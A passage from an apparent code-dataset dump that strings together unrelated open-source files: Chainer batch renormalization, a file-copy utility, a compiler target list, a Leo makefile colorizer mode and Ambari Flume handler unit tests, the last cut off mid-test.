temp_ar *= (1 - self.decay) * adjust
self.running_var += temp_ar
del temp_ar
else:
self.r = xp.ones_like(gamma)
self.d = xp.zeros_like(gamma)
if self.freeze_running_statistics:
# Need to explicitly cast during gradient check, as r and d are
# not updated during finite differences
self.r = self.r.astype(gamma.dtype)
self.d = self.d.astype(gamma.dtype)
gamma = gamma[expander]
beta = beta[expander]
if xp is numpy:
self.x_hat = _xhat(x, mean, self.std, expander)
self.x_hat_renorm = self.x_hat * self.r[expander] + \
self.d[expander]
y = gamma * self.x_hat_renorm
y += beta
else:
self.x_hat, self.x_hat_renorm, y = cuda.elementwise(
'T x, T mean, T std, T gamma, T beta, T r, T d',
'T x_hat, T x_hat_renorm, T y',
'''
x_hat = (x - mean) / std;
x_hat_renorm = x_hat * r + d;
y = gamma * x_hat_renorm + beta;
''',
'bn_fwd')(x, mean[expander], self.std[expander], gamma,
beta, self.r[expander], self.d[expander])
return y,
def backward(self, inputs, grad_outputs):
x, gamma = inputs[:2]
gy = grad_outputs[0]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
m = gamma.dtype.type(x.size // gamma.size)
axis = (0,) + tuple(range(head_ndim, x.ndim))
xp = cuda.get_array_module(x)
if len(inputs) == 5:
# This case is unlikely to be used in practice and so does not
# need to be optimized for performance.
mean = inputs[3]
var = inputs[4]
std = xp.sqrt(var, dtype=var.dtype)
gs = gamma / std
gbeta = gy.sum(axis=axis)
x_hat = _xhat(x, mean, std, expander)
ggamma = (gy * x_hat).sum(axis=axis)
gmean = -gs * gbeta
gvar = -0.5 * gamma / var * ggamma
gx = gs[expander] * gy
return gx, ggamma, gbeta, gmean, gvar
# Note: If length of inputs is not 5, we must be in train mode.
assert configuration.config.train
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
gbeta = gy.sum(axis=axis)
ggamma = (gy * self.x_hat_renorm).sum(axis=axis)
gsigma_batch = (gy * self.x_hat).sum(axis=axis)
if xp is numpy:
scale = (self.r * gamma / self.std)[expander]
gx = scale * (gy - (self.x_hat * gsigma_batch[expander] +
gbeta[expander]) / m)
else:
inv_m = numpy.float32(1) / m
gx = cuda.elementwise(
'T gy, T x_hat, T gamma, T std, T gsigma_batch, T gbeta, \
T inv_m, T r',
'T gx',
'gx = (r * gamma / std) * (gy - (x_hat * gsigma_batch + gbeta) * \
inv_m)',
'bn_bwd')(gy, self.x_hat, gamma[expander],
self.std[expander], gsigma_batch[expander],
gbeta[expander], inv_m, self.r[expander])
return gx, ggamma, gbeta
def batch_renormalization(x, gamma, beta, rmax, dmax, eps=2e-5,
running_mean=None, running_var=None, decay=0.9):
"""Batch renormalization function.
This is an extension of batch normalization, which ensures that the
training and inference models generate the same outputs that depend on
individual examples rather than the entire minibatch.
See: `Batch Renormalization: Towards Reducing Minibatch Dependence in \
Batch-Normalized Models <https://arxiv.org/abs/1702.03275>`_
.. seealso:: :class:`links.BatchRenormalization`
.. seealso:: :func:`functions.BatchNormalization`
"""
return BatchRenormalizationFunction(eps, running_mean, running_var,
decay, rmax, dmax)(x, gamma, beta)
def fixed_batch_renormalization(x, gamma, beta, mean, var, eps=2e-5):
with configuration.using_config('train', False):
return BatchRenormalizationFunction(eps, None, None, 0.0)(
x, gamma, beta, mean, var)
| 38.19469 | 82 | 0.542632 |
2b18cdeebcb568cfd90558ce253bf78195162f62
| 4,450 |
py
|
Python
|
branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py
|
brown-ccv/VRG3D
|
0854348453ac150b27a8ae89024ef57360f15d45
|
[
"BSD-3-Clause"
] | null | null | null |
branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py
|
brown-ccv/VRG3D
|
0854348453ac150b27a8ae89024ef57360f15d45
|
[
"BSD-3-Clause"
] | null | null | null |
branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py
|
brown-ccv/VRG3D
|
0854348453ac150b27a8ae89024ef57360f15d45
|
[
"BSD-3-Clause"
] | null | null | null |
# copyifnewer.py
#
#
import re, string
from utils import *
_excludeDirPatterns = \
['^\.',\
'^#',\
'~$',\
'^\.svn$',\
'^\.git$',\
'^CVS$', \
'^Debug$', \
'^Release$', \
'^graveyard$', \
'^tmp$', \
'^temp$', \
'^\.icompile-temp$', \
'^\.ice-tmp$', \
'^build$']
""" Regular expression patterns that will be excluded from copying by
copyIfNewer.
"""
_excludeFromCopyingPatterns =\
['\.ncb$', \
'\.opt$', \
'\.ilk$', \
'\.cvsignore$', \
'^\.\#', \
'\.pdb$', \
'\.bsc$', \
'^\.DS_store$', \
'\.o$', \
'\.pyc$', \
'\.obj$', \
'\.pyc$', \
'\.plg$', \
'^#.*#$', \
'^ice-stats\.csv$'\
'~$', \
'\.old$' \
'^log.txt$', \
'^stderr.txt$', \
'^stdout.txt$', \
'\.log$', \
'\^.cvsignore$'] + _excludeDirPatterns
"""
Regular expression patterns (i.e., directory and filename patterns) that are
excluded from the search for cpp files
"""
_cppExcludePatterns = ['^test$', '^tests$', '^#.*#$', '~$', '^old$'] + _excludeFromCopyingPatterns
"""
A regular expression matching files that should be excluded from copying.
"""
excludeFromCopying = re.compile(string.join(_excludeFromCopyingPatterns, '|'))
""" Linked list of the source names that were copied """
_copyIfNewerCopiedAnything = None
"""
Recursively copies all contents of source to dest
(including source itself) that are out of date. Does
not copy files matching the excludeFromCopying patterns.
Returns a list of the files (if any were copied)
If actuallyCopy is false, doesn't actually copy the files, but still prints.
"""
def copyIfNewer(source, dest, echoCommands = True, echoFilenames = True, actuallyCopy = True):
global _copyIfNewerCopiedAnything
_copyIfNewerCopiedAnything = []
if source == dest:
# Copying in place
return False
dest = removeTrailingSlash(dest)
if (not os.path.exists(source)):
# Source does not exist
return False
if (not os.path.isdir(source) and newer(source, dest)):
if echoCommands:
colorPrint('cp ' + source + ' ' + dest, COMMAND_COLOR)
elif echoFilenames:
print source
if actuallyCopy:
shutil.copyfile(source, dest)
_copyIfNewerCopiedAnything += [source]
else:
# Walk is a special iterator that visits all of the
# children and executes the 2nd argument on them.
os.path.walk(source, _copyIfNewerVisit,
[len(source), dest, echoCommands, echoFilenames, actuallyCopy])
if len(_copyIfNewerCopiedAnything) == 0 and echoCommands:
print dest + ' is up to date with ' + source
return _copyIfNewerCopiedAnything
#########################################################################
"""Helper for copyIfNewer.
args is a list of:
[length of the source prefix in sourceDirname,
rootDir of the destination tree,
echo commands
echo filenames]
"""
def _copyIfNewerVisit(args, sourceDirname, names):
global _copyIfNewerCopiedAnything
prefixLen = args[0]
# Construct the destination directory name
# by concatenating the root dir and source dir
destDirname = pathConcat(args[1], sourceDirname[prefixLen:])
dirName = betterbasename(destDirname)
echoCommands = args[2]
echoFilenames = args[3]
actuallyCopy = args[4]
if (excludeFromCopying.search(dirName) != None):
# Don't recurse into subdirectories of excluded directories
del names[:]
return
# Create the corresponding destination dir if necessary
if actuallyCopy:
mkdir(destDirname, echoCommands)
# Iterate through the contents of this directory
for name in names:
source = pathConcat(sourceDirname, name)
if ((excludeFromCopying.search(name) == None) and
(not os.path.isdir(source))):
# Copy files if newer
dest = pathConcat(destDirname, name)
if (newer(source, dest)):
if echoCommands:
colorPrint('cp ' + source + ' ' + dest, COMMAND_COLOR)
elif echoFilenames:
print name
_copyIfNewerCopiedAnything += [source]
if actuallyCopy:
shutil.copy(source, dest)
| 26.807229 | 98 | 0.577079 |
7ce9bb2076104e2c919ca2bace341dc0e69a68b0
| 1,059 |
py
|
Python
|
ppci/arch/target_list.py
|
rakati/ppci-mirror
|
8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2
|
[
"BSD-2-Clause"
] | null | null | null |
ppci/arch/target_list.py
|
rakati/ppci-mirror
|
8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2
|
[
"BSD-2-Clause"
] | null | null | null |
ppci/arch/target_list.py
|
rakati/ppci-mirror
|
8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2
|
[
"BSD-2-Clause"
] | 1 |
2021-11-23T14:23:04.000Z
|
2021-11-23T14:23:04.000Z
|
""" Contains a list of instantiated targets. """
from functools import lru_cache
from .arm import ArmArch
from .avr import AvrArch
from .example import ExampleArch
from .msp430 import Msp430Arch
from .x86_64 import X86_64Arch
from .m68k import M68kArch
from .mcs6500 import Mcs6500Arch
from .mips import MipsArch
from .microblaze import MicroBlazeArch
from .or1k import Or1kArch
from .riscv import RiscvArch
from .stm8 import Stm8Arch
from .xtensa import XtensaArch
target_classes = [
ArmArch,
AvrArch,
ExampleArch,
M68kArch,
Mcs6500Arch,
MicroBlazeArch,
MipsArch,
Msp430Arch,
Or1kArch,
RiscvArch,
Stm8Arch,
X86_64Arch,
XtensaArch,
]
target_class_map = {t.name: t for t in target_classes}
target_names = tuple(sorted(target_class_map.keys()))
@lru_cache(maxsize=30)
def create_arch(name, options=None):
""" Get a target architecture by its name. Possibly arch options can be
given.
"""
# Create the instance!
target = target_class_map[name](options=options)
return target
| 22.0625 | 75 | 0.734655 |
b1a623842a392ffea61905da6c2dfa2e9ab44fbb
| 7,439 |
py
|
Python
|
leo/modes/makefile.py
|
ATikhonov2/leo-editor
|
225aac990a9b2804aaa9dea29574d6e072e30474
|
[
"MIT"
] | 1,550 |
2015-01-14T16:30:37.000Z
|
2022-03-31T08:55:58.000Z
|
leo/modes/makefile.py
|
ATikhonov2/leo-editor
|
225aac990a9b2804aaa9dea29574d6e072e30474
|
[
"MIT"
] | 2,009 |
2015-01-13T16:28:52.000Z
|
2022-03-31T18:21:48.000Z
|
leo/modes/makefile.py
|
ATikhonov2/leo-editor
|
225aac990a9b2804aaa9dea29574d6e072e30474
|
[
"MIT"
] | 200 |
2015-01-05T15:07:41.000Z
|
2022-03-07T17:05:01.000Z
|
# Leo colorizer control file for makefile mode.
# This file is in the public domain.
# Properties for makefile mode.
properties = {
"lineComment": "#",
}
# Attributes dict for makefile_main ruleset.
makefile_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for makefile_variable ruleset.
makefile_variable_attributes_dict = {
"default": "KEYWORD2",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for makefile mode.
attributesDictDict = {
"makefile_main": makefile_main_attributes_dict,
"makefile_variable": makefile_variable_attributes_dict,
}
# Keywords dict for makefile_main ruleset.
makefile_main_keywords_dict = {
"addprefix": "keyword1",
"addsuffix": "keyword1",
"basename": "keyword1",
"dir": "keyword1",
"filter": "keyword1",
"filter-out": "keyword1",
"findstring": "keyword1",
"firstword": "keyword1",
"foreach": "keyword1",
"join": "keyword1",
"notdir": "keyword1",
"origin": "keyword1",
"patsubst": "keyword1",
"shell": "keyword1",
"sort": "keyword1",
"strip": "keyword1",
"subst": "keyword1",
"suffix": "keyword1",
"wildcard": "keyword1",
"word": "keyword1",
"words": "keyword1",
}
# Keywords dict for makefile_variable ruleset.
makefile_variable_keywords_dict = {}
# Dictionary of keywords dictionaries for makefile mode.
keywordsDictDict = {
"makefile_main": makefile_main_keywords_dict,
"makefile_variable": makefile_variable_keywords_dict,
}
# Rules for makefile_main ruleset.
def makefile_rule0(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="#",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def makefile_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="$(", end=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule2(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="${", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule3(colorer, s, i):
return colorer.match_mark_following(s, i, kind="keyword2", pattern="$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def makefile_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule5(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule6(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="`", end="`",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule7(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="label", pattern=":",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def makefile_rule8(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for makefile_main ruleset.
rulesDict1 = {
"\"": [makefile_rule4,],
"#": [makefile_rule0,],
"$": [makefile_rule1,makefile_rule2,makefile_rule3,],
"'": [makefile_rule5,],
"-": [makefile_rule8,],
"0": [makefile_rule8,],
"1": [makefile_rule8,],
"2": [makefile_rule8,],
"3": [makefile_rule8,],
"4": [makefile_rule8,],
"5": [makefile_rule8,],
"6": [makefile_rule8,],
"7": [makefile_rule8,],
"8": [makefile_rule8,],
"9": [makefile_rule8,],
":": [makefile_rule7,],
"@": [makefile_rule8,],
"A": [makefile_rule8,],
"B": [makefile_rule8,],
"C": [makefile_rule8,],
"D": [makefile_rule8,],
"E": [makefile_rule8,],
"F": [makefile_rule8,],
"G": [makefile_rule8,],
"H": [makefile_rule8,],
"I": [makefile_rule8,],
"J": [makefile_rule8,],
"K": [makefile_rule8,],
"L": [makefile_rule8,],
"M": [makefile_rule8,],
"N": [makefile_rule8,],
"O": [makefile_rule8,],
"P": [makefile_rule8,],
"Q": [makefile_rule8,],
"R": [makefile_rule8,],
"S": [makefile_rule8,],
"T": [makefile_rule8,],
"U": [makefile_rule8,],
"V": [makefile_rule8,],
"W": [makefile_rule8,],
"X": [makefile_rule8,],
"Y": [makefile_rule8,],
"Z": [makefile_rule8,],
"`": [makefile_rule6,],
"a": [makefile_rule8,],
"b": [makefile_rule8,],
"c": [makefile_rule8,],
"d": [makefile_rule8,],
"e": [makefile_rule8,],
"f": [makefile_rule8,],
"g": [makefile_rule8,],
"h": [makefile_rule8,],
"i": [makefile_rule8,],
"j": [makefile_rule8,],
"k": [makefile_rule8,],
"l": [makefile_rule8,],
"m": [makefile_rule8,],
"n": [makefile_rule8,],
"o": [makefile_rule8,],
"p": [makefile_rule8,],
"q": [makefile_rule8,],
"r": [makefile_rule8,],
"s": [makefile_rule8,],
"t": [makefile_rule8,],
"u": [makefile_rule8,],
"v": [makefile_rule8,],
"w": [makefile_rule8,],
"x": [makefile_rule8,],
"y": [makefile_rule8,],
"z": [makefile_rule8,],
}
# Rules for makefile_variable ruleset.
def makefile_rule9(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="#",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def makefile_rule10(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="$(", end=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule11(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="${", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
# Rules dict for makefile_variable ruleset.
rulesDict2 = {
"#": [makefile_rule9,],
"$": [makefile_rule10,makefile_rule11,],
}
# x.rulesDictDict for makefile mode.
rulesDictDict = {
"makefile_main": rulesDict1,
"makefile_variable": rulesDict2,
}
# Import dict for makefile mode.
importDict = {}
| 33.062222 | 96 | 0.631671 |
3955122092b4512cdfa321095167ee5998bf67a7
| 152 |
py
|
Python
|
biosiglive/__init__.py
|
Fiverdug/biosiglive
|
72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82
|
[
"MIT"
] | null | null | null |
biosiglive/__init__.py
|
Fiverdug/biosiglive
|
72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82
|
[
"MIT"
] | null | null | null |
biosiglive/__init__.py
|
Fiverdug/biosiglive
|
72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82
|
[
"MIT"
] | null | null | null |
from . import client
from . import data_plot
from . import data_processing
from . import live_data_pytrigno
from . import live_mvc
from . import server
| 21.714286 | 32 | 0.802632 |
4cf43c134cd4576ec677dbe72e9a1597f8853db4
| 25,049 |
py
|
Python
|
ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py
|
hmcl/ambari-apache
|
87423d64f54d896c62d1a9245eb03a97763e35a4
|
[
"Apache-2.0"
] | 3 |
2019-06-20T11:49:36.000Z
|
2020-12-11T10:44:29.000Z
|
ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py
|
cas-packone/ambari-chs
|
68033fbd4b810b6642853f2ad9128cbbd4e0cb7b
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py
|
cas-packone/ambari-chs
|
68033fbd4b810b6642853f2ad9128cbbd4e0cb7b
|
[
"Apache-2.0"
] | 1 |
2019-03-20T08:36:17.000Z
|
2019-03-20T08:36:17.000Z
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, call, patch
from stacks.utils.RMFTestCase import *
import resource_management.core.source
import os
class TestFlumeHandler(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "FLUME/1.4.0.2.0/package"
STACK_VERSION = "2.0.6"
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default()
self.assertNoMoreResources()
@patch("os.path.isfile")
@patch("flume.cmd_target_names")
@patch("flume._set_desired_state")
def test_start_default(self, set_desired_mock, cmd_target_names_mock, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
cmd_target_names_mock.return_value = ["a1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default()
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'STARTED')
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name a1 --conf /etc/flume/conf/a1 --conf-file /etc/flume/conf/a1/flume.conf -Dflume.monitoring.type=org.apache.hadoop.metrics2.sink.flume.FlumeTimelineMetricsSink -Dflume.monitoring.node=c6402.ambari.apache.org:6189 > /var/log/flume/a1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*a1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/a1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("os.path.isfile")
@patch("flume.cmd_target_names")
@patch("flume._set_desired_state")
def test_start_flume_only(self, set_desired_mock, cmd_target_names_mock, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
cmd_target_names_mock.return_value = ["a1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="flume_only.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default(check_mc=False)
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'STARTED')
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name a1 --conf /etc/flume/conf/a1 --conf-file /etc/flume/conf/a1/flume.conf > /var/log/flume/a1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*a1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/a1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("glob.glob")
@patch("flume._set_desired_state")
@patch("flume.await_flume_process_termination")
def test_stop_default(self, await_flume_process_termination_mock, set_desired_mock, glob_mock):
glob_mock.side_effect = [['/var/run/flume/a1/pid'], ['/etc/flume/conf/a1/ambari-meta.json']]
await_flume_process_termination_mock.return_value = True
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "stop",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertTrue(glob_mock.called)
await_flume_process_termination_mock.assert_called_with('/var/run/flume/a1.pid')
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'INSTALLED')
self.assertResourceCalled('File', '/var/run/flume/a1.pid', action = ['delete'])
self.assertNoMoreResources()
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("sys.exit")
def test_status_default(self, sys_exit_mock, structured_out_mock):
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
# test that the method was called with empty processes
self.assertTrue(structured_out_mock.called)
structured_out_mock.assert_called_with({'processes': []})
self.assertNoMoreResources()
def test_struct_out(self):
from resource_management.libraries.script import Script
configs_path = os.path.join(RMFTestCase.get_src_folder(),
"test/python/stacks", self.STACK_VERSION, "configs")
script = Script()
script.stroutfile = os.path.join(configs_path, "structured-out-status.json")
script.load_structured_out()
self.assertFalse("version" in script.structuredOut)
def test_bad_struct_out(self):
from resource_management.libraries.script import Script
from resource_management.core.logger import Logger
configs_path = os.path.join(RMFTestCase.get_src_folder(),
"test/python/stacks", self.STACK_VERSION, "configs")
Logger.initialize_logger()
script = Script()
script.stroutfile = os.path.join(configs_path, "structured-out-status-bad.json")
script.load_structured_out()
self.assertTrue(script.structuredOut == {})
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("glob.glob")
@patch("sys.exit")
def test_status_with_result(self, sys_exit_mock, glob_mock, structured_out_mock):
glob_mock.return_value = ['/etc/flume/conf/a1/ambari-meta.json']
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
self.assertTrue(structured_out_mock.called)
# call_args[0] is a tuple, whose first element is the actual call argument
struct_out = structured_out_mock.call_args[0][0]
self.assertTrue(struct_out.has_key('processes'))
self.assertNoMoreResources()
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("glob.glob")
@patch("sys.exit")
def test_status_no_agents(self, sys_exit_mock, glob_mock, structured_out_mock):
glob_mock.return_value = []
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
self.assertTrue(structured_out_mock.called)
# call_args[0] is a tuple, whose first element is the actual call argument
struct_out = structured_out_mock.call_args[0][0]
self.assertTrue(struct_out.has_key('processes'))
self.assertNoMoreResources()
def assert_configure_default(self, check_mc=True):
self.assertResourceCalled('Directory', '/var/run/flume',
owner = 'flume',
group = 'hadoop')
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755
)
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
content = Template('log4j.properties.j2', agent_name = 'a1'),
owner='flume',
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
if check_mc:
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-metrics2.properties",
owner="flume",
content=Template("flume-metrics2.properties.j2")
)
def assert_configure_many(self):
self.assertResourceCalled('Directory',
'/var/run/flume',
owner='flume',
group = 'hadoop'
)
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755)
top = build_flume(self.getConfig()['configurations']['flume-conf']['content'])
# a1
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = top['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'a1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
# b1
self.assertResourceCalled('Directory',
'/etc/flume/conf/b1',
owner='flume')
self.assertResourceCalled('PropertiesFile', '/etc/flume/conf/b1/flume.conf',
mode = 0644,
owner='flume',
properties = top['b1'])
self.assertResourceCalled('File',
'/etc/flume/conf/b1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'b1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/b1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/b1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
@patch("os.path.isfile")
def test_start_single(self, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_many()
self.assertResourceCalled('Execute', format('su -s /bin/bash flume -c "export JAVA_HOME=/usr/jdk64/jdk1.7.0_45; /usr/bin/flume-ng agent '
'--name b1 '
'--conf /etc/flume/conf/b1 '
'--conf-file /etc/flume/conf/b1/flume.conf '
'-Dflume.monitoring.type=ganglia '
'-Dflume.monitoring.hosts=c6401.ambari.apache.org:8655"'),
wait_for_finish = False)
self.assertResourceCalled('Execute', 'pgrep -o -u flume -f ^/usr/jdk64/jdk1.7.0_45.*b1.* > /var/run/flume/b1.pid',
logoutput = True,
tries = 10,
try_sleep = 6)
self.assertNoMoreResources()
@patch("os.path.isfile")
def test_start_single(self, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
